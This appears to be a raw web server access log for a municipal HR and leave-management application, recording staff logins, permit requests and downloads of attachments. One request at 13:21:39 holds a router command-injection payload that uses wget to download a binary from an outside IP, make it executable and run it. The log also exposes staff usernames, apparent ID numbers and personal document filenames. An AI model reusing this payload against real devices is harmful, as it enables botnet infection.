181.212.47.137 - - [23/Apr/2024:13:00:04 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713887779479 HTTP/1.1" 200 6666
181.212.47.137 - - [23/Apr/2024:13:00:08 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21158,, HTTP/1.1" 200 8384
181.212.47.137 - - [23/Apr/2024:13:00:08 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:00:22 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21158,,SolicitudOTAdjuntos HTTP/1.1" 200 10967
181.212.47.137 - - [23/Apr/2024:13:00:22 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:00:23 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:00:25 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21158,,General HTTP/1.1" 200 8386
181.212.47.137 - - [23/Apr/2024:13:00:25 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:00:27 -0300] "POST /cormun/servlet/vesolicitudgral?48ff026ec35be810bb347948e07e635f,2024,21158,,General,gx-no-cache=1713887801953 HTTP/1.1" 200 12285
181.212.47.137 - - [23/Apr/2024:13:00:27 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
181.212.47.137 - - [23/Apr/2024:13:00:27 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
181.212.47.137 - - [23/Apr/2024:13:00:27 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
181.212.47.137 - - [23/Apr/2024:13:00:27 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.143.106 - - [23/Apr/2024:13:00:59 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3325
190.171.143.106 - - [23/Apr/2024:13:00:59 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.171.143.106 - - [23/Apr/2024:13:01:02 -0300] "POST /cormun/servlet/hlogin?13bad26a376bd9cddcc03ccdff6e04da,gx-no-cache=1713887838115 HTTP/1.1" 200 90
190.171.143.106 - - [23/Apr/2024:13:01:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.143.106 - - [23/Apr/2024:13:01:02 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4270
190.171.143.106 - - [23/Apr/2024:13:01:04 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11030
181.212.47.137 - - [23/Apr/2024:13:03:32 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 9711
181.212.47.137 - - [23/Apr/2024:13:04:17 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888032031 HTTP/1.1" 200 5268
181.212.47.137 - - [23/Apr/2024:13:04:17 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888032668 HTTP/1.1" 200 5269
190.171.153.26 - - [23/Apr/2024:13:05:19 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12970
190.171.153.26 - - [23/Apr/2024:13:05:19 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12979
190.171.153.26 - - [23/Apr/2024:13:05:26 -0300] "GET /cormun/servlet/trpermisosadjuntos?19358822,20240423112050,P, HTTP/1.1" 200 6289
190.171.153.26 - - [23/Apr/2024:13:05:26 -0300] "GET /cormun/servlet/trpermisosadjuntos?19358822,20240423112050,P, HTTP/1.1" 200 6290
190.171.153.26 - - [23/Apr/2024:13:05:27 -0300] "GET /cormun/servlet/permisosadjuntos?INS,19358822,P,20240423112050,, HTTP/1.1" 200 5609
190.171.153.26 - - [23/Apr/2024:13:05:28 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.153.26 - - [23/Apr/2024:13:05:28 -0300] "GET /cormun/servlet/permisosadjuntos?INS,19358822,P,20240423112050,, HTTP/1.1" 200 5599
190.171.153.26 - - [23/Apr/2024:13:05:37 -0300] "POST /cormun/servlet/permisosadjuntos?2e56ff37bf97d02b39046c5c676e4334,INS,19358822,P,20240423112050,, HTTP/1.1" 200 116
190.171.153.26 - - [23/Apr/2024:13:05:37 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.153.26 - - [23/Apr/2024:13:05:37 -0300] "GET /cormun/servlet/trpermisosadjuntos?19358822,20240423112050,P, HTTP/1.1" 200 6762
190.171.153.26 - - [23/Apr/2024:13:05:37 -0300] "GET /cormun/servlet/trpermisosadjuntos?19358822,20240423112050,P, HTTP/1.1" 200 6759
181.212.47.137 - - [23/Apr/2024:13:05:38 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888113331 HTTP/1.1" 200 8087
190.171.153.26 - - [23/Apr/2024:13:05:39 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12980
190.171.153.26 - - [23/Apr/2024:13:05:40 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12969
181.212.47.137 - - [23/Apr/2024:13:05:43 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21125,, HTTP/1.1" 200 8370
181.212.47.137 - - [23/Apr/2024:13:05:43 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.153.26 - - [23/Apr/2024:13:05:46 -0300] "POST /cormun/servlet/trpermisosgoce?2e56ff37bf97d02b39046c5c676e4334,,gx-no-cache=1713888124141 HTTP/1.1" 200 10098
190.171.153.26 - - [23/Apr/2024:13:05:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.153.26 - - [23/Apr/2024:13:05:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.153.26 - - [23/Apr/2024:13:05:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.153.26 - - [23/Apr/2024:13:05:46 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
181.212.47.137 - - [23/Apr/2024:13:05:58 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 11133
31.49.67.43 - - [23/Apr/2024:13:07:09 -0300] "òîºeŽ]d¨|LÕ9}QYU§c—f©Þ$>{õr·¦ J.—àch³,y­ÙF³svå‰=ºæø cñ8½C&À+À/À,À0̨̩À ÀÀ" 400 -
31.49.67.43 - - [23/Apr/2024:13:07:09 -0300] "-" 400 -
31.49.67.43 - - [23/Apr/2024:13:07:10 -0300] "GET / HTTP/1.1" 200 11217
181.212.47.137 - - [23/Apr/2024:13:07:22 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888217460 HTTP/1.1" 200 9977
190.171.153.26 - - [23/Apr/2024:13:07:30 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9777
190.171.153.26 - - [23/Apr/2024:13:07:30 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9776
181.212.47.137 - - [23/Apr/2024:13:07:45 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888240542 HTTP/1.1" 200 5271
181.212.47.137 - - [23/Apr/2024:13:07:53 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888248730 HTTP/1.1" 200 7123
190.171.152.138 - - [23/Apr/2024:13:09:24 -0300] "POST /cormun/servlet/permisosadjuntos?05348450b829442dbce5a33bea841cd4,INS,13719645,P,20240423111344,, HTTP/1.1" 200 116
190.171.152.138 - - [23/Apr/2024:13:09:24 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1038
190.171.152.138 - - [23/Apr/2024:13:09:24 -0300] "GET /cormun/servlet/trpermisosadjuntos?13719645,20240423111344,P, HTTP/1.1" 200 6550
190.171.152.138 - - [23/Apr/2024:13:09:34 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 11058
190.171.152.138 - - [23/Apr/2024:13:09:43 -0300] "POST /cormun/servlet/trpermisosgoce?05348450b829442dbce5a33bea841cd4,,gx-no-cache=1713888359999 HTTP/1.1" 200 8365
190.171.152.138 - - [23/Apr/2024:13:09:43 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.152.138 - - [23/Apr/2024:13:09:43 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.152.138 - - [23/Apr/2024:13:09:43 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.152.138 - - [23/Apr/2024:13:09:43 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.95.15.15 - - [23/Apr/2024:13:10:01 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6047
190.95.15.15 - - [23/Apr/2024:13:10:01 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
190.171.152.138 - - [23/Apr/2024:13:10:05 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1742
190.95.15.15 - - [23/Apr/2024:13:10:08 -0300] "POST /cormun/servlet/hlogin?59f6ee8173ce8cb61d7b7f7332ed6311,gx-no-cache=1713888385146 HTTP/1.1" 200 90
190.95.15.15 - - [23/Apr/2024:13:10:08 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.95.15.15 - - [23/Apr/2024:13:10:08 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 12071
190.171.152.138 - - [23/Apr/2024:13:10:23 -0300] "POST /cormun/servlet/hlogin?05348450b829442dbce5a33bea841cd4,gx-no-cache=1713888399556 HTTP/1.1" 200 90
190.171.152.138 - - [23/Apr/2024:13:10:23 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.152.138 - - [23/Apr/2024:13:10:23 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4317
190.171.152.138 - - [23/Apr/2024:13:10:29 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8014
190.171.152.138 - - [23/Apr/2024:13:10:51 -0300] "POST /cormun/servlet/trautorizarpermisogoce?05348450b829442dbce5a33bea841cd4,,gx-no-cache=1713888427823 HTTP/1.1" 200 4525
190.171.152.138 - - [23/Apr/2024:13:10:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.152.138 - - [23/Apr/2024:13:10:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.152.138 - - [23/Apr/2024:13:10:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.152.138 - - [23/Apr/2024:13:10:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.152.138 - - [23/Apr/2024:13:11:04 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1747
190.171.152.138 - - [23/Apr/2024:13:11:17 -0300] "POST /cormun/servlet/hlogin?05348450b829442dbce5a33bea841cd4,gx-no-cache=1713888454092 HTTP/1.1" 200 90
190.171.152.138 - - [23/Apr/2024:13:11:17 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.152.138 - - [23/Apr/2024:13:11:17 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3864
190.171.152.138 - - [23/Apr/2024:13:11:21 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10993
201.186.225.183 - - [23/Apr/2024:13:11:39 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
201.186.225.183 - - [23/Apr/2024:13:11:53 -0300] "POST /cormun/servlet/hlogin?f78ad6b4a0034384824845a72cdcb139,gx-no-cache=1713888490280 HTTP/1.1" 200 448
201.186.225.183 - - [23/Apr/2024:13:11:58 -0300] "POST /cormun/servlet/hlogin?f78ad6b4a0034384824845a72cdcb139,gx-no-cache=1713888495238 HTTP/1.1" 200 90
201.186.225.183 - - [23/Apr/2024:13:11:58 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 943
201.186.225.183 - - [23/Apr/2024:13:11:58 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4330
201.186.225.183 - - [23/Apr/2024:13:12:00 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 7444
201.186.225.183 - - [23/Apr/2024:13:12:00 -0300] "GET /cormun/static/gxcfg.js?202211298474254 HTTP/1.1" 304 -
201.186.225.183 - - [23/Apr/2024:13:12:00 -0300] "GET /cormun/static/trautorizarsolicitud.js?202211298474588 HTTP/1.1" 304 -
181.212.47.137 - - [23/Apr/2024:13:12:09 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888504281 HTTP/1.1" 200 8686
201.186.225.183 - - [23/Apr/2024:13:12:11 -0300] "POST /cormun/servlet/trautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,,gx-no-cache=1713888508039 HTTP/1.1" 200 8708
181.212.47.137 - - [23/Apr/2024:13:12:11 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,, HTTP/1.1" 200 8459
181.212.47.137 - - [23/Apr/2024:13:12:11 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.152.138 - - [23/Apr/2024:13:12:18 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1742
181.212.47.137 - - [23/Apr/2024:13:14:09 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,SolicitudOTAdjuntos HTTP/1.1" 200 11177
181.212.47.137 - - [23/Apr/2024:13:14:09 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:14:10 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:14:12 -0300] "GET /cormun/PublicTempStorage/cv_-_belen_gonzalez8275449.pdf HTTP/1.1" 200 57796
181.212.47.137 - - [23/Apr/2024:13:14:21 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,SolicitudOTAdjuntos HTTP/1.1" 200 11172
181.212.47.137 - - [23/Apr/2024:13:14:22 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:14:32 -0300] "GET /cormun/PublicTempStorage/certificado_afiliacion_afp_%283%299121549.pdf HTTP/1.1" 200 25621
181.212.47.137 - - [23/Apr/2024:13:14:44 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,SolicitudOTAdjuntos HTTP/1.1" 200 11175
181.212.47.137 - - [23/Apr/2024:13:14:45 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:14:47 -0300] "GET /cormun/PublicTempStorage/certificado_de_afiliacion_salud4616083.pdf HTTP/1.1" 200 71794
181.212.47.137 - - [23/Apr/2024:13:14:53 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,SolicitudOTAdjuntos HTTP/1.1" 200 11174
181.212.47.137 - - [23/Apr/2024:13:14:54 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:14:56 -0300] "GET /cormun/PublicTempStorage/certificado_antecedentes5852580.pdf HTTP/1.1" 200 34392
181.212.47.137 - - [23/Apr/2024:13:15:26 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,SolicitudOTAdjuntos HTTP/1.1" 200 11175
181.212.47.137 - - [23/Apr/2024:13:15:27 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:15:48 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,,General HTTP/1.1" 200 8462
181.212.47.137 - - [23/Apr/2024:13:15:48 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:16:45 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 11246
181.212.47.137 - - [23/Apr/2024:13:16:51 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888784537 HTTP/1.1" 200 26110
181.212.47.137 - - [23/Apr/2024:13:16:56 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888791147 HTTP/1.1" 200 6665
181.212.47.137 - - [23/Apr/2024:13:17:42 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 9708
201.186.225.183 - - [23/Apr/2024:13:17:44 -0300] "POST /cormun/servlet/trautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,,gx-no-cache=1713888842031 HTTP/1.1" 200 5934
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/servlet/veautorizarsolicitud?2024,21158,, HTTP/1.1" 200 8664
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/gxcfg.js?202211298474783 HTTP/1.1" 200 953
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabFirstSelected.png HTTP/1.1" 200 1270
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/veautorizarsolicitud.js?202211298474813 HTTP/1.1" 200 6140
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/hpexe_tabsview.js?2020121447381 HTTP/1.1" 200 1661
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/hwcviewtabs.js?201991422154026 HTTP/1.1" 200 1074
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabLastUnselected.png HTTP/1.1" 200 1297
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabPrevious.gif HTTP/1.1" 200 172
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/tbautorizarsolicitud01.js?20221129837213 HTTP/1.1" 200 30580
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabNext.gif HTTP/1.1" 200 168
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/calendar-system.css HTTP/1.1" 200 5572
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabSelectedUnselected.png HTTP/1.1" 200 1451
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabBackSelected.png HTTP/1.1" 200 1157
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabBackUnselected.png HTTP/1.1" 200 1175
201.186.225.183 - - [23/Apr/2024:13:17:47 -0300] "GET /cormun/static/Resources/PXToolsTabUnselectedUnselected.png HTTP/1.1" 200 1470
181.212.47.137 - - [23/Apr/2024:13:17:49 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713888844335 HTTP/1.1" 200 11833
181.212.47.137 - - [23/Apr/2024:13:17:51 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21293,, HTTP/1.1" 200 8461
181.212.47.137 - - [23/Apr/2024:13:17:51 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
201.186.225.183 - - [23/Apr/2024:13:18:58 -0300] "POST /cormun/servlet/veautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,2024,21158,,,gx-no-cache=1713888915185 HTTP/1.1" 200 93
201.186.225.183 - - [23/Apr/2024:13:18:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
201.186.225.183 - - [23/Apr/2024:13:18:58 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8840
201.186.225.183 - - [23/Apr/2024:13:19:03 -0300] "POST /cormun/servlet/trautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,,gx-no-cache=1713888920077 HTTP/1.1" 200 5952
201.186.225.183 - - [23/Apr/2024:13:19:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
201.186.225.183 - - [23/Apr/2024:13:19:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
201.186.225.183 - - [23/Apr/2024:13:19:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
201.186.225.183 - - [23/Apr/2024:13:19:03 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
201.186.225.183 - - [23/Apr/2024:13:19:08 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8836
201.186.225.183 - - [23/Apr/2024:13:19:10 -0300] "POST /cormun/servlet/trautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,,gx-no-cache=1713888927841 HTTP/1.1" 200 5950
201.186.225.183 - - [23/Apr/2024:13:19:11 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
201.186.225.183 - - [23/Apr/2024:13:19:11 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
201.186.225.183 - - [23/Apr/2024:13:19:11 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
201.186.225.183 - - [23/Apr/2024:13:19:11 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
201.186.225.183 - - [23/Apr/2024:13:19:14 -0300] "POST /cormun/servlet/trautorizarsolicitud?f78ad6b4a0034384824845a72cdcb139,,gx-no-cache=1713888931992 HTTP/1.1" 200 5950
201.186.225.183 - - [23/Apr/2024:13:21:07 -0300] "GET /cormun/servlet/veautorizarsolicitud?2024,21158,, HTTP/1.1" 200 8664
201.186.225.183 - - [23/Apr/2024:13:21:07 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
179.43.190.218 - - [23/Apr/2024:13:21:39 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1013
190.171.149.74 - - [23/Apr/2024:13:22:28 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6053
190.171.149.74 - - [23/Apr/2024:13:22:28 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
190.171.149.74 - - [23/Apr/2024:13:22:35 -0300] "POST /cormun/servlet/hlogin?472a2ec3c4a279c3927fce1673d017b7,gx-no-cache=1713889129854 HTTP/1.1" 200 90
190.171.149.74 - - [23/Apr/2024:13:22:35 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.149.74 - - [23/Apr/2024:13:22:36 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 13120
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/servlet/veautorizarsolicitud?2024,21158,,SolicitudOTLog HTTP/1.1" 200 10547
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/Resources/PXToolsTabLastSelected.png HTTP/1.1" 200 1274
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/tbautorizarsolicitud03.js?202211298365818 HTTP/1.1" 200 13367
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/gxui/gxui-all.css HTTP/1.1" 200 2179
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/Resources/PXToolsTabFirstUnselected.png HTTP/1.1" 200 1278
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/Resources/PXToolsTabUnselectedSelected.png HTTP/1.1" 200 1458
201.186.225.183 - - [23/Apr/2024:13:22:40 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css HTTP/1.1" 200 416045
201.186.225.183 - - [23/Apr/2024:13:22:41 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,CINOSTROZA,true HTTP/1.1" 200 35
190.171.153.26 - - [23/Apr/2024:13:23:37 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7184
190.171.153.26 - - [23/Apr/2024:13:23:37 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7184
190.171.153.26 - - [23/Apr/2024:13:23:39 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15961
190.171.153.26 - - [23/Apr/2024:13:23:39 -0300] "GET /cormun/static/gxcfg.js?20221129840861 HTTP/1.1" 200 953
190.171.153.26 - - [23/Apr/2024:13:23:39 -0300] "GET /cormun/static/solicitudot.js?20221129840983 HTTP/1.1" 200 74072
190.171.153.26 - - [23/Apr/2024:13:23:40 -0300] "GET /cormun/servlet/solicitudot?INS,0,0,false, HTTP/1.1" 200 15969
190.171.153.26 - - [23/Apr/2024:13:24:48 -0300] "POST /cormun/servlet/solicitudot?2e56ff37bf97d02b39046c5c676e4334,INS,0,0,false,,gx-no-cache=1713889267248 HTTP/1.1" 200 93
190.171.153.26 - - [23/Apr/2024:13:24:48 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1007
190.171.153.26 - - [23/Apr/2024:13:24:49 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7188
190.171.153.26 - - [23/Apr/2024:13:24:49 -0300] "GET /cormun/servlet/trsolicitudot HTTP/1.1" 200 7184
190.171.153.26 - - [23/Apr/2024:13:24:52 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9781
190.171.153.26 - - [23/Apr/2024:13:24:53 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 9776
181.212.47.137 - - [23/Apr/2024:13:25:23 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 14962
181.212.47.137 - - [23/Apr/2024:13:26:08 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713889343559 HTTP/1.1" 200 7585
181.212.47.137 - - [23/Apr/2024:13:26:50 -0300] "POST /cormun/servlet/trsolicitudgral?48ff026ec35be810bb347948e07e635f,,gx-no-cache=1713889385242 HTTP/1.1" 200 8175
181.212.47.137 - - [23/Apr/2024:13:26:54 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21260,, HTTP/1.1" 200 8407
181.212.47.137 - - [23/Apr/2024:13:26:54 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:26:57 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21260,,SolicitudOTAdjuntos HTTP/1.1" 200 7092
181.212.47.137 - - [23/Apr/2024:13:26:57 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
181.212.47.137 - - [23/Apr/2024:13:26:58 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
181.212.47.137 - - [23/Apr/2024:13:26:59 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21260,,General HTTP/1.1" 200 8411
181.212.47.137 - - [23/Apr/2024:13:26:59 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
201.186.225.183 - - [23/Apr/2024:13:30:25 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7563
201.186.225.183 - - [23/Apr/2024:13:30:44 -0300] "GET /cormun/servlet/trsolicitudot? HTTP/1.1" 200 7546
